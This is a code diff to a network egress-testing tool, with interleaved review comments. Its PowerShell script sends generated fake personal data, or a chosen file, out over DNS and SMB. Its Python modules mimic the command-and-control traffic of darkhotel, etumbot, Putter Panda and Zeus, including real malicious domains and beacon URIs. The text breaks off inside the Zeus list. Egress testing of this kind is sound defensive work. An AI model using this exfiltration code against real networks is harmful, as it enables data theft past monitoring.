@@ -884,41 +1650,48 @@ function Invoke-EgressAssess Write-Verbose $ErrorMessage Break } - Write-Verbose "[*] Transfer complete!" - $loops-- - Write-Verbose "[*] $loops loops remaining.." - } While ($loops -gt 0) + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) } function Use-DNSResolved { if ($Datatype -contains "ssn" -or "cc" -or "identity") { - if ($Datatype -eq "ssn") { + if ($Datatype -eq "ssn") + { Generate-SSN [string]$DNSData = $AllSSN } - elseif ($Datatype -eq "cc") { + elseif ($Datatype -eq "cc") + { Generate-CreditCards [string]$DNSData = $AllCC } - elseif ($Datatype -eq "identity") { - Generate-Names + elseif ($Datatype -eq "identity") + { + Generate-Identity [string]$DNSData = $AllNames } - - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { - Write-Verbose "[*] You did not provide a data type to generate." - Write-Verbose "[*] DNS file transfers currently not supported." - break + + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { + Write-Verbose "[*] You did not provide a data type to generate." + Write-Verbose "[*] DNS file transfers currently not supported." + break } } else { Write-Verbose "[*] You did not provide a data type to generate." } - Do { - try { + Do + { + try + { Write-Verbose "Sending data via DNS..this may take awhile." $ByteReader = 0 While ($ByteReader -le ($DNSData.length - 20)) @@ -938,10 +1711,11 @@ function Invoke-EgressAssess Write-Verbose $ErrorMessage Break } - Write-Verbose "[*] Transfer complete!" - $loops-- - Write-Verbose "[*] $loops loops remaining.." - } While ($loops -gt 0) + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) } function Use-SMB 
@@ -956,50 +1730,53 @@ function Invoke-EgressAssess Generate-SSN [string]$SMBData = $AllSSN } - elseif ($Datatype -eq "identity") { - Generate-Names - [string]$SMBData = $AllNames - } - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { + elseif ($Datatype -eq "identity") + { + Generate-Identity + [string]$SMBData = $AllNames + } + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } - Write-Verbose "[*] Sending file to egress server.." + Write-Verbose "[*] Sending file to egress server.." + try + { + Copy-Item -Path $Datatype -Destination \\$IP\data + Write-Verbose "[*] File transfer complete." + Break + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, file tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + + } + # If we're sending faux data, generate the file, send and delete it. + Do + { + try + { + $Date = Get-Date -Format Mdyyyy_hhmmss + $Path = "smbdata_" + $Date + ".txt" + $SMBData | Out-File "$env:temp\$Path" + Copy-Item -Path $env:temp\$Path -Destination \\$IP\data + try { - Copy-Item -Path $Datatype -Destination \\$IP\data - Write-Verbose "[*] File transfer complete." - Break + Remove-Item -Path $env:temp\$Path } catch { $ErrorMessage = $_.Exception.Message - Write-Verbose "[*] Error, file tranfer failed with error:" + Write-Verbose "[*] Error, unable to remove temporary file." Write-Verbose $ErrorMessage Break } - - } - # If we're sending faux data, generate the file, send and delete it. - Do { - try - { - $Date = Get-Date -Format Mdyyyy_hhmmss - $Path = "smbdata_" + $Date + ".txt" - $SMBData | Out-File "$env:temp\$Path" - Copy-Item -Path $env:temp\$Path -Destination \\$IP\data - - try - { - Remove-Item -Path $env:temp\$Path - } - catch - { - $ErrorMessage = $_.Exception.Message - Write-Verbose "[*] Error, unable to remove temporary file." 
- Write-Verbose $ErrorMessage - Break - } - } + } catch { $ErrorMessage = $_.Exception.Message @@ -1007,12 +1784,13 @@ function Invoke-EgressAssess Write-Verbose $ErrorMessage Break } - Write-Verbose "[*] Transfer complete!" - $loops-- - Write-Verbose "[*] $loops loops remaining.." - } While ($loops -gt 0) + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) } - + #write report to console and file to C:\Egress-Assess\report.txt #future enhancement: add variable input for report path and filename #future enhancement: add filename of exfilled file to report @@ -1022,21 +1800,22 @@ function Invoke-EgressAssess Write-Verbose "----------Egress-Assess Report----------" Write-Verbose "Report File = $Report" $EAreport = [ordered]@{ - "Server"=$IP - "Datatype"=$datatype.toUpper() - "Protocol"=$client.toUpper() - "Size (MB)"=$Size - "Loops"=$loops - "Time (seconds)"=[Math]::Round($(($endTime-$startTime).totalseconds),2) + "Server" = $IP + "Datatype" = $datatype.toUpper() + "Protocol" = $client.toUpper() + "Size (MB)" = $Size + "Loops" = $loops + "Time (seconds)" = [Math]::Round($(($endTime - $startTime).totalseconds), 2) "Date" = Get-Date } try { - if((Test-Path -path $Report) -eq $False) + if ((Test-Path -path $Report) -eq $False) { Write-Verbose "[*] Writing new report file..." $null > $Report - } else {} + } + else { } Write-Output $EAreport | Format-Table | Tee-Object -file $Report -Append } catch 
@@ -1045,64 +1824,68 @@ function Invoke-EgressAssess break } } - } process { - if (!$NoPing) { - Test-ServerConnection - } + if ($Actor) + { + Use-Actor $Actor + } + if (!$NoPing) + { + Test-ServerConnection + } - if ($client -eq "http" -or $client -eq "https") - { - Use-HTTP - } - elseif ($client -eq "ftp") - { - Use-Ftp - } - elseif ($client -eq "smtp") - { - Use-SMTP - } - elseif ($client -eq "sftp") - { - Use-SFTP - } - elseif ($client -eq "icmp") - { - Use-ICMP - } - elseif ($client -eq "dnstxt") - { - Use-DNSTXT - } - elseif ($client -eq "dnsresolved") - { - Use-DNSResolved - } - elseif ($client -eq "smb") - { - Use-SMB - } - else - { - Write-Verbose "[*] You failed to provide a protocol" - Return - } - - #get end time - $endTime = (Get-Date) - - if($Report -gt 0) - { - Write-Report - } else {} + if ($client -eq "http" -or $client -eq "https") + { + Use-HTTP + } + elseif ($client -eq "ftp") + { + Use-Ftp + } + elseif ($client -eq "smtp") + { + Use-SMTP + } + elseif ($client -eq "sftp") + { + Use-SFTP + } + elseif ($client -eq "icmp") + { + Use-ICMP + } + elseif ($client -eq "dnstxt") + { + Use-DNSTXT + } + elseif ($client -eq "dnsresolved") + { + Use-DNSResolved + } + elseif ($client -eq "smb") + { + Use-SMB + } + else + { + Write-Verbose "[*] You failed to provide a protocol" + Return + } + + #get end time + $endTime = (Get-Date) + + if ($Report -gt 0) + { + Write-Report + } + else { } } end { [System.GC]::Collect() Write-Verbose "[*] Exiting.." } - -} +} \ No newline at end of file diff --git a/commandcontrol/__init__.py b/commandcontrol/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/commandcontrol/apt/__init__.py b/commandcontrol/apt/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/commandcontrol/apt/darkhotel.py b/commandcontrol/apt/darkhotel.py new file mode 100644 index 0000000..48103e4 --- /dev/null +++ b/commandcontrol/apt/darkhotel.py 
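Review bot: `if ($Actor) { Use-Actor $Actor }` at the top of the process block is not followed by a return, so once the actor emulation finishes execution falls through to `Test-ServerConnection` and the `$client` dispatch; with no `-client` given that ends in "You failed to provide a protocol" and `Return`, which also skips `Write-Report`. If the actor path is meant to stand alone, `if ($Actor) { Use-Actor $Actor; Return }` makes that explicit. Use-Actor itself (earlier in the file, outside this hunk) ends each branch with `Break` outside any loop; a `break` with no enclosing loop unwinds through the calling scopes, so depending on how the function is invoked it may terminate the caller's script rather than just Use-Actor, and `Return` is the safer choice there.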
@@ -0,0 +1,89 @@
+'''
+
+This module generates darkhotel traffic.
+
+Resources:
+https://securelist.com/blog/research/66779/the-darkhotel-apt/
+
+'''
+
+import random
+import sys
+import urllib
+import urllib2
+
+
+class Actor:
+
+ def __init__(self, cli_object):
+ self.cli = "darkhotel"
+ self.description = "darkhotel backdoor"
+ self.type = "malware"
+ self.server_requirement = "http"
+ self.egress_server = cli_object.ip
+ self.domains = [
+ 'micronaoko.jumpingcrab.com', 'microchsse.strangled.net',
+ 'microbrownys.strangled.net', 'microplants.strangled.net',
+ 'microlilics.crabdance.com']
+ self.uris = [
+ '/bin/read_i.php?a1=step2-down-b&a2=KJNSDFkjmdfH&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTMtMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgWFAgKFNlcnZpY2UgUGFjayAzKU5ldCBjYXJkIDogMTkyLjE2OC4wLjIgKDEzMzc3MzMxMTMzNyk=&a4=KS',
+ '/bin/read_i.php?a1=step2-down-r&a2=KDYEMDYWM&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgNyAoU2VydmljZSBQYWNrIDIpTmV0IGNhcmQgOiAxOTIuMTY4LjI1LjIgKDEzMzc3MzMxMTMzNyk=&a4=TR',
+ '/bin/read_i.php?a1=step2-down-u&a2=YEMDGEJEIMD&a3=SW5mb1N5c0BVc2VyIFdvcmtzdGF0aW9uQFNvbm9mRmx5bm4gKDA4NTApQyBQIFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy0xNTBVIENQVSBAIDE2MDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDguMSAoU2VydmljZSBQYWNrIDEpTmV0IGNhcmQgOiAxOTIuMTY4LjMzLjIgKDEzMzc3MzMxMTMzNyk=&a4=BD',
+ '/bin/read_i.php?a1=step2-down-c&a2=MSNETJ&a3=SW5mb1N5c0BVc2VyIFNFUlZFUkRDQEFETUlOICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctOTBVIENQVSBAIDIwMDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDEwIE5ldCBjYXJkIDogMTkyLjE2OC4xMzMuMiAoMTMzNzczMzExMzM3KQ==&a4=AST',
+ '/bin/read_i.php?a1=step2-down-k&a2=VSEJKNEF&a3=SW5mb1N5c0BVc2VyIERCQURCQFNZU0RCQSAoMDg1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MCBDUFUgQCAzMjAwR0h6U3lzdGVtIE9TOiBNaWNyb3NvZnQgV2luZG93cyBTZXJ2ZXIgMjAwMyBOZXQgY2FyZCA6IDE5Mi4xNjguMTUzLjIgKDEzMzc3MzMxMTMzNyk=&a4=NOD'
+ '/bin/read_i.php?a1=step2-down-j&a2=ALFDOEJNKF&a3=SW5mb1N5c0BVc2VyIERBZG1pbkBEQ1N5cyAoMDk1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MDAgQ1BVIEAgMzgwMUdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgU2VydmVyIDIwMDggTmV0IGNhcmQgOiAxOTIuMTY4LjE5My4yICgxMzM3NzMzMTEzMzcp&a4=NV']
+ self.checkin_domains = [
+ 'autolace.twilightparadox.com', 'automachine.servequake.com']
+
+ def emulate(self, data_to_exfil=None):
+
+ # headers that are used in get requests
+ darkhotel_headers = {
+ "User-Agent": " Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)",
+ "Connection": "Keep-Alive",
+ "Cache-Control": "no-cache",
+ }
+
+ selected_checkin_domain = random.choice(self.checkin_domains)
+ darkhotel_headers['Host'] = selected_checkin_domain
+
+ get_request = urllib2.Request(
+ "http://" + self.egress_server + "/major/images/view.php",
+ headers=darkhotel_headers)
+
+ try:
+ urllib2.urlopen(get_request)
+ except urllib2.URLError:
+ print "[*] Error: Cannot connect to darkhotel data exfil server!"
+ print "[*] Error: Possible firewall, or proxy prventing this?"
+ sys.exit(1)
+
+ get_request2 = urllib2.Request(
+ "http://" + self.egress_server + "/major/txt/read.php",
+ headers=darkhotel_headers)
+
+ try:
+ urllib2.urlopen(get_request2)
+ except urllib2.URLError:
+ print "[*] Error: Cannot connect to darkhotel data exfil server!"
+ print "[*] Error: Possible firewall, or proxy prventing this?"
+ sys.exit(1)
+
+ # Iterate over get and post request 5 times
+ for times_requested in xrange(1, 6):
+ selected_domain = random.choice(self.domains)
+ darkhotel_headers['Host'] = selected_domain
+ darkhotel_uri = random.choice(self.uris)
+
+ get_req2 = urllib2.Request(
+ "http://" + self.egress_server + darkhotel_uri, headers=darkhotel_headers)
+
+ try:
+ urllib2.urlopen(get_req2)
+ except urllib2.URLError:
+ print "[*] Error: Cannot connect to darkhotel data exfil server!"
+ print "[*] Error: Possible firewall, or proxy prventing this?"
+ print "URI == " + darkhotel_uri
+
+ print "[*] INFO: DarkHotel C2 comms complete!"
+ return
diff --git a/commandcontrol/apt/etumbot.py b/commandcontrol/apt/etumbot.py
new file mode 100644
index 0000000..9afdb35
--- /dev/null
+++ b/commandcontrol/apt/etumbot.py
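Review bot: The `self.uris` list is missing a comma after the `...&a4=NOD'` element, so Python's implicit string concatenation merges the `step2-down-k` and `step2-down-j` entries into one malformed URI and the list holds five items instead of six; add the trailing comma on that line. `import urllib` is unused (only `urllib2` is called) and can be dropped. The `urllib2.urlopen` responses are never closed, and the two check-in requests call `sys.exit(1)` on a `URLError` while the loop only prints and continues; raising or returning a status from `emulate` would let the orchestrator decide, since this is library code rather than the entry point.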
@@ -0,0 +1,96 @@ +''' + +This module generates etumbot traffic. + +Resources: +https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/etumbot.profile + +''' + +import random +import sys +import urllib2 + + +class Actor: + + def __init__(self, cli_object): + self.cli = "etumbot" + self.description = "etumbot backdoor" + self.type = "malware" + self.server_requirement = "http" + self.egress_server = cli_object.ip + self.domains = [ + '200.27.173.58', '200.42.69.140', '92.54.232.42', '133.87.242.63', + '98.188.111.244', 'intro.sunnyschool.com.tw', '143.89.145.156', + '198.209.212.82', '143.89.47.132', '196.1.199.15', + 'wwap.publiclol.com', '59.0.249.11', '190.16.246.129', + '211.53.164.152', 'finance.yesplusno.com'] + self.encoded_string = [ + 'dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--', + 'Y2F0Y2hldHVtYm90aWZ5b3VjYW4-', + 'Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24-', + 'bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA--', + 'd2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw-', + 'U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl', + 'dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-', + 'bm90cmVkYW1lY2hlYXRzdG93aW4-', + 'dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l', + 'YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy'] + self.post_data = [ + {'etumbot_id': 'uid=0(root) gid=0(root) groups=0(root)'}, + {'etumbot_whoami': 'root'}, {'etumbot_dir': 'C:\\, C:\\Windows'}, + {'etumbot_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'}, + {'etumbot_ipconfig': '192.168.1.83 255.255.255.0 192.168.1.1'}, + {'etumbot_ping': 'google.com time=11.6, 19.1, 12.8, 20'}] + self.uris = [ + '/image/' + random.choice(self.encoded_string) + '.jpg', + '/history/' + random.choice(self.encoded_string) + '.asp', + '/manage/asp/item.asp?id=' + random.choice(self.encoded_string) + '&&mux=' + random.choice(self.encoded_string), + '/article/30441/Review.asp?id=' + random.choice(self.encoded_string) + '&&date=' + random.choice(self.encoded_string), + '/tech/s.asp?m=' + random.choice(self.encoded_string)] + + def emulate(self, 
data_to_exfil=None): + + # headers that are used in get requests + etumbot_headers = { + "User-Agent": "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)", + "Connection": "Keep-Alive", + "Referrer": "http://www.google.com/", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Accept": "text/html,application/xhtml+xml,application/xml,q=0.9,*/*;q=0.8" + } + + selected_domain = random.choice(self.domains) + etumbot_headers['Host'] = selected_domain + + get_request = urllib2.Request( + "http://" + self.egress_server + "/home/index.asp?typeid=13", + headers=etumbot_headers) + + try: + urllib2.urlopen(get_request) + except urllib2.URLError: + print "[*] Error: Cannot connect to etumbot data exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" + sys.exit(1) + + # Iterate over get and post request 5 times + for times_requested in xrange(1, 6): + selected_domain = random.choice(self.domains) + etumbot_headers['Host'] = selected_domain + etumbot_uri = random.choice(self.uris) + + get_req2 = urllib2.Request( + "http://" + self.egress_server + etumbot_uri, headers=etumbot_headers) + + try: + urllib2.urlopen(get_req2) + except urllib2.URLError: + print "[*] Error: Cannot connect to etumbot data exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" + print "URI == " + etumbot_uri + + print "[*] INFO: Etumbot C2 comms complete!" + return diff --git a/commandcontrol/apt/putterpanda.py b/commandcontrol/apt/putterpanda.py new file mode 100644 index 0000000..8cb32ba --- /dev/null +++ b/commandcontrol/apt/putterpanda.py 
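Review bot: `emulate` ignores its `data_to_exfil` argument and `self.post_data` is never read, so this actor only issues GET requests and a run that supplies data to send silently sends nothing, unlike the putterpanda and zeus hunks which POST it (the darkhotel hunk above has the same shape); either add the POST leg or state in the module docstring that etumbot emulation is check-in only. The `"Referrer"` key in `etumbot_headers` is not the standard header name, so the request carries an unrecognised header and an inspection rule keyed on the real one is never exercised; `"Referer": "http://www.google.com/",`. Each `urllib2.urlopen(...)` result is dropped without being closed, and `sys.exit(1)` from inside a module method takes the exit decision away from the caller — raising and letting the entry point exit would keep the class reusable. The message typo `prventing` recurs here and in the putterpanda and zeus hunks.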
@@ -0,0 +1,108 @@ +''' + +This module generates putterpanda traffic. + +Resources: +http://blog.crowdstrike.com/hat-tribution-pla-unit-61486/ +https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/putter.profile + +''' + +import random +import sys +import urllib +import urllib2 + + +class Actor: + + def __init__(self, cli_object): + self.cli = "putterpanda" + self.description = "Putter Panda APT" + self.type = "malware" + self.server_requirement = "http" + self.egress_server = cli_object.ip + self.domains = [ + 'ctable.org', 'gamemuster.com', 'kyoceras.net', 'nestlere.com', + 'raylitoday.com', 'renewgis.com', 'siseau.com', 'bmwauto.org', + 't008.net', 'vssigma.com', 'anyoffice.info', 'it-bar.net', + 'jj-desk.com', 'satelliteclub.info', 'space-today.info', + 'sst1.info', 'stream-media.info', 'webfilestore.net'] + self.post_data = [ + {'putterpanda_id': 'uid=0(root) gid=0(root) groups=0(root)'}, + {'putterpanda_whoami': 'root'}, {'putterpanda_dir': 'C:\\, C:\\Windows'}, + {'putterpanda_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'}, + {'putterpanda_ipconfig': '192.168.1.83 255.255.255.0 192.168.1.1'}, + {'putterpanda_ping': 'google.com time=11.6, 19.1, 12.8, 20'}] + self.encoded_hostnames = [ + 'SG9tZVBD', 'Q29tcGFueVdvcmtzdGF0aW9u', + 'd29ya3N0YXRpb24tMTMy', 'UHJpbWFyeURvbWFpbkNvbnRyb2xsZXI=', + 'ZmlsZXNlcnZlcg==', 'd2Vic2VydmVy', 'RE5Tc2VydmVyMg==', + 'Yml0c3kubWl0LmVkdQ==', 'c2VydmVyMS5jaWEuZ292', + 'ZXZpZGVuY2UuZmJpLmdvdg==', 'ZGIuc3NhLmdvdg==', + 'cGlpLmZkYS5nb3Y=', 'ZGF0YS5mZGEuZ292'] + self.uris = [ + '/search5' + str(self.gen_numbers()) + '?h1=' + str(self.gen_numbers(num=2)) + '&h2=' + random.choice('13') + '&h3=' + str(self.gen_numbers(num=6)) + '&h4=' + self.random_letters(), + '/microsoft/errorpost/default/connect.aspx?ID=' + str(self.gen_numbers()), + '/MicrosoftUpdate/ShellEX/KB' + str(self.gen_numbers(num=7)) + '/default.aspx?tmp=' + random.choice(self.encoded_hostnames), + '/microsoft/errorpost/default.aspx?ID=' + 
str(self.gen_numbers()), + '/MicrosoftUpdate/GetUpdate/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames), + '/MicrosoftUpdate/GetFiles/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames), + '/MicrosoftUpdate/WWRONG/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames)] + + + def emulate(self, data_to_exfil=None): + + # headers that are used in get requests + putter_headers = { + "Accept": "*/*", + "Connection": "Keep-Alive", + "User-Agent": "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)", + } + + # Iterate over get and post request 5 times + for times_requested in xrange(1, 6): + selected_domain = random.choice(self.domains) + putter_headers['Host'] = selected_domain + putter_uri = random.choice(self.uris) + + # Determining which data is being sent out by agent + if data_to_exfil is None: + posted_data = random.choice(self.post_data) + else: + posted_data = {'putterpanda_data': data_to_exfil} + + # UrlEncode and send the data out + posted_data = urllib.urlencode(posted_data) + post_req = urllib2.Request( + "http://" + self.egress_server + putter_uri, posted_data, headers=putter_headers) + + try: + urllib2.urlopen(post_req) + except urllib2.URLError: + print "[*] Error: Cannot connect to putter panda data exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" + sys.exit(1) + + print "[*] INFO: PutterPanda C2 comms complete!" + + return + + def gen_numbers(self, num=5): + if num == 5: + return random.randint(10000, 99999) + elif num == 2: + return random.randint(10, 99) + elif num == 6: + return random.randint(100000, 999999) + elif num == 7: + return random.randint(1000000, 9999999) + else: + print "odd error?" + sys.exit() + return + + def random_letters(self, total=24): + random_string = ''.join( + random.choice('ABCDEFGHIJKLMNOP') for x in range(total)) + return random_string 
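Review bot: In `gen_numbers` an unsupported `num` prints `odd error?` and calls `sys.exit()` with status 0, and the `return` after it is unreachable; the whole if/elif chain reduces to `return random.randint(10 ** (num - 1), 10 ** num - 1)`, which yields exactly the existing ranges for 2, 5, 6 and 7 and makes any other width work without a special case. `self.uris` is rendered once in `__init__`, so all five iterations of `emulate` pick from the same seven fixed strings rather than fresh numbers and letters — if per-request variation was intended, build the URI inside the loop. `urllib2.urlopen(post_req)` returns a response that is never read or closed, and `times_requested` is unused (`for _ in xrange(5)`). There are two blank lines before `def emulate` where the file otherwise uses one.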
diff --git a/commandcontrol/malware/__init__.py b/commandcontrol/malware/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/commandcontrol/malware/zeus.py b/commandcontrol/malware/zeus.py new file mode 100644 index 0000000..b4145da --- /dev/null +++ b/commandcontrol/malware/zeus.py 
@@ -0,0 +1,279 @@ +''' + +This module generates Zeus traffic. + +Resources: +https://zeustracker.abuse.ch/blocklist.php +https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/zeus.profile + +''' + +import random +import sys +import urllib +import urllib2 + + +class Actor: + + def __init__(self, cli_object): + self.cli = "zeus" + self.description = "Zeus Malware" + self.type = "malware" + self.server_requirement = "http" + self.egress_server = cli_object.ip + self.domains = [ + '0x.x.gg', '6pjddrtt7.com', 'apexholdngs.com', 'baoshlda.com', + 'bestdove.in.ua', 'championbft.com', 'codedtunes.zapto.org', + 'cooldomainname.ws', 'danislenefc.info', 'dau43vt5wtrd.tk', + 'diosdelared.com.mx', 'emaillifecoaching.com.au', 'emekonline.tk', + 'eresimgbo.com', 'escoesco.info', 'fileserver03.com', + 'finsolutions.top', 'fronty2073.net', 'genmjob3.ru', + 'gjiayimeiya.com', 'gorainbowzone.tk', 'hope-found-now.net', + 'hruner.com', 'hui-ain-apparel.tk', 'ice.ip64.net', + 'interglobalswiss.info', 'jomo.in.ua', 'juyteche.tk', + 'kesikelyaf.com', 'legitvendors.ru', 'lion.web2.0campus.net', + 'liveresellerweb.eu', 'mccc-investconsultant.com' 'muazymaur.tk', + 'mymytonnymaxltd.org', 'mypic.hopto.org', 'mystartap.com', + 'neease.com', 'ns513726.ip-192-99-148.net', + 'panel.vargakragard.se', 'polyaire-au.com', + 'projects.globaltronics.net', 'regame.su', 'richus.ru', + 'server.bovine-mena.com', 'ssl.sinergycosmetics.com', + 'sslsam.com', 'sus.nieuwmoer.info', 'tesab.org.uk', + 'up.frigo2000.it', 'update.odeen.eu', 'update.rifugiopontese.it', + 'urchilaa.com', 'winscoft.com', 'www.nikey.cn', + 'www.riverwalktrader.co.za', 'www.witkey.com', 'zabava-bel.ru'] + self.post_data = [ + {'zeus_id': 'uid=0(root) gid=0(root) groups=0(root)'}, + {'zeus_whoami': 'root'}, {'zeus_dir': 'C:\\, C:\\Windows'}, + {'zeus_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'}, + {'zeus_ipconfig': '192.168.1.15 255.255.255.0 192.168.1.1'}, + {'zeus_ping': 'google.com time=13.6, 15.1, 
19.8, 20'}] + self.uris = [ + '/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin', + '/jm32/includes/site/gate.php', '/mathew/config.jpg', + '/docs/.docs/config.jpg', '/docs/.docs/do.php', + '/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe', + '/zeujuus/a/modules/config.bin', + '/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php', + '/zejius/2HZG41Zw/bot.exe', + '/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin', + '/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php', + '/zejius/5GPR0iy9/bot.exe', + '/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg', + '/past/gate.php', '/fan/base/config.jpg', + '/wp-includes/pomo/panel/config.jpg', + '/wp-includes/pomo/panel/gate.php', '/themes/panel/config.jpg', + '/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php', + '/home/plugins/system/tmp/bot.scr', + '/home/plugins/system/tmp/config.bin', + '/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg', + '/js/ssj/gate.php', '/site/tmp/xml/config.jpg', + '/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php', + '/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban', + '/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg', + '/vs/panel/gate.php', '/brand/server/file.php', + '/brand/server/gate.php', + '/wp-admin/css/colors/sunrise/admin/bot.exe', + '/wp-admin/css/colors/sunrise/admin/config.bin', + '/wp-admin/css/colors/sunrise/admin/secure.php', + '/wp-content/themes/chagim/library/images/plates/bot.exe', + '/wp-content/themes/chagim/library/images/plates/config.bin', + '/wp-content/themes/chagim/library/images/plates/gate.php', + '/images/burr_insurance001001.php', '/images/team/config.jpg', + '/images/team/gate.php', '/test/config.jpg', '/test/gate.php', + '/ray/server/file.php', '/ray/server/gate.php', '/capa.bin', + '/capa.exe', '/secure.php', '/ral/30/config.bin', + '/ral/30/secure.php', '/wp-admin/css/config.bin', + '/wp-admin/css/gate.php', '/wp-admin/css/setup.exe', + '/panel/config.jpg', '/panel/gate.php', + 
'/wp-includes2/SimplePie/Net/page/config.jpg', + '/wp-includes2/SimplePie/Net/page/gate.php', + '/includes/.srv/srv/bot.exe', + '/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php', + '/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin', + '/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg', + '/images2/gate.php', '/wp-includes/ID3/config.jpg', + '/wp-includes/ID3/gate.php', '/emman/panel/config.jpg', + '/emman/panel/gate.php', '/xampp/img/escu.bin', + '/xampp/img/escu.exe', '/xampp/img/secure.php', + '/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin', + '/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe', + '/isai/modules/mod_upgrade/config.bin', + '/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg', + '/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php', + '/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php', + '/img/vg.php', '/components/com_file/file.php', + '/components/com_file/gate.php', '/images/panel/config.jpg', + '/images/panel/gate.php', '/wordpress/gate.php', + '/wordpress/gree.jpg', '/media/.tmp/file.php', + '/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin', + '/modules/holl.exe', '/templates/admin/install/config.jpg', + '/templates/admin/install/gate.php', + '/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php', + '/tmp/cp/config.jpg', '/tmp/cp/gate.php', + '/tmp/install/config.jpg', '/tmp/install/gate.php', + '/frank/panel/config.jpg', '/frank/panel/gate.php', + '/tmp/configs/new/vg.php', '/meask/lite/file.php', + '/meask/lite/gate.php', '/css/src/admin/config.jpg', + '/css/src/admin/gate.php', '/js/admin/install/config.jpg', + '/js/admin/install/gate.php', + '/wp-content/plugins/wp-db-backup-made/work.php', + '/update/bot.exe', '/update/cfg.bin', '/update/gate.php', + '/chopinschumann/ital.bin', '/chopinschumann/ital.exe', + '/chopinschumann/secure.php', '/images/ital.bin', + '/images/ital.exe', '/images/secure.php', + '/compose/panel/bot.exe', '/compose/panel/config.bin', 
